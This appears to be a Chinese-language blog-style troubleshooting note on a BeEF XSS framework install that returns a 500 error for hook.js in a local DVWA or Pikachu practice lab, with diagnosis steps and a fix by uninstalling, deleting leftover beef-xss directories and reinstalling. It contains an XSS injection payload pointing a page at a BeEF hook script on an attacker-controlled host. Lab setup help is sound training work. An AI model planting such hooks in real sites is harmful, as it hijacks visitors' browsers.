错误现象
在物理机靶场(dvwa或者pikachu)
提交
<script>http://虚拟机IP:3000/hook.js</script>通过F12查看网络请求,可以看到获取hook.js文件的请求是报错的
500 Internal Server Error
问题排查
在Kali中打开火狐浏览器,访问:
http://127.0.0.1:3000/demos/basic.html在输入框粘贴:
<script>http://127.0.0.1:3000/hook.js</script>然后点击advanced demo page进行访问
打开控制台,如果:
- 1、可以看到Kali本机上线,可以证明程序没问题,是物理机和虚拟机网络的问题。
- 2、反之,如果无法上线,那么就是程序本身的问题。
问题原因
因为和虚拟机的网络是连通的(可以ping通),而且本机的3000端口用
netstat -an|grep 3000命令确认正在监听,可以判断是安装的程序出了问题。
解决办法
彻底卸载 beef-xss
命令:
apt remove beef-xss此外,还要删除遗留的文件:
只删除因为安装而产生的文件
find / -name "*beef-xss*"这里提供一个现成的命令:
language-bash
rm -rf /var/lib/beef-xss/
rm -rf /var/lib/dpkg/info/beef-xss*
rm -rf /usr/bin/beef-xss
rm -rf /usr/bin/beef-xss-stop
rm -rf /usr/share/beef-xss
rm -rf /usr/share/doc/beef-xss
rm -rf /etc/beef-xss删除以后,更新系统:
apt update
apt upgrade重装:
apt install beef-xss